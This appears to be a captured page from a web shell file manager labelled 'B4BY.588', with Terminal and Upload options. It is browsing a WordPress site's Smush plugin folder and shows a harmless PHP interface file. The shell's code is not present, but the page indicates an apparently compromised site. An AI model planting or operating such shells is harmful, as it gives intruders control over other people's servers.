B4BY.588
Home
Terminal
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
sportmx
/
public_html
/
wp-content
/
plugins
/
wp-smushit
/
core
/
parser
/
Filename :
class-replaceable.php
back
Copy
<?php namespace Smush\Core\Parser; interface Replaceable { public function get_original(); public function get_updated(); public function get_position(); public function has_updates(); }